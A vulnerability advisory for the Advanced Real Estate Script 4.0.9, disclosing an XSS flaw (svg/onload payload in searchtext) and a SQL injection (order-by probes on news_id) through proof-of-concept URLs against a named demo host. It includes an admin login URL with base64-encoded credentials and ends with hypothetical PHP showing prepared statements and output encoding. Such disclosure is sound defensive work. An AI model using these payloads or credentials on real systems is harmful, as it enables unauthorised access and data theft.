PHP Scripts Mall Advanced Real Estate Script Version 4.0.9 - Multiple Vulnerabilities
Product :- Advanced Real Estate Script
Version:- 4.0.9
Vendor:- PHP Scripts Mall
Vendor URL:- https://phpscriptsmall.com/product/advanced-real-estate-script/
**Cross Site Scripting**
CVE-ID :- CVE-2019-20336
Proof of Concept:-
XSS:-
http://thavasu.com/demo/advance-realestate/search-results.php?Projectmain=&proj_type=&searchtext=mad">-->"><svg/onload=alert(document.domain)>
**SQL Injection**
CVE-ID :- CVE-2019-20337
Proof of Concept:-
SQLI:-
- Log in to the admin panel: http://thavasu.com/demo/advance-realestate/admin/index.php?dlogin&username=YWRtaW4=&password=aW5ldHNvbA==
- http://thavasu.com/demo/advance-realestate/admin/news_edit.php?news_id=21%27order%20by%207--+- (no error)
- http://thavasu.com/demo/advance-realestate/admin/news_edit.php?news_id=21%27order%20by%208--+- (error)
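Mitigation for the two parameters above, as an added example that is not the vendor's code: `news_id` is validated as an integer and bound in a prepared statement, and `searchtext` is HTML-encoded before being echoed. The product's source is not shown in this advisory, so the `news` table, its columns, the function names, and the assumption that `searchtext` is reflected into an attribute value are all hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in for the news table; the real schema is not in the advisory.
function demo_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE news (news_id INTEGER PRIMARY KEY, title TEXT)');
    $pdo->exec("INSERT INTO news VALUES (21, 'Constructed sample row')");
    return $pdo;
}

// news_edit.php: accept news_id only if it is a positive integer, then bind it
// as a typed parameter so it can never become part of the SQL text.
function load_news(PDO $pdo, string $rawId): ?array {
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // non-numeric input is rejected before any SQL runs
    }
    $stmt = $pdo->prepare('SELECT news_id, title FROM news WHERE news_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// search-results.php: encode searchtext for the HTML context it is echoed into.
// ENT_QUOTES covers both quote styles, so the value cannot close the attribute.
function render_search_box(string $searchtext): string {
    $safe = htmlspecialchars($searchtext, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="searchtext" value="' . $safe . '">';
}

// Inputs below are the parameter values from the proof-of-concept URLs (URL-decoded).
$pdo = demo_db();
var_dump(load_news($pdo, '21'));
var_dump(load_news($pdo, "21'order by 7-- -"));
echo render_search_box('mad">-->"><svg/onload=alert(document.domain)>'), "\n";
```

Running it requires the `pdo_sqlite` extension; in the real application the same `prepare`/`bindValue` pattern applies to whichever database driver the script uses.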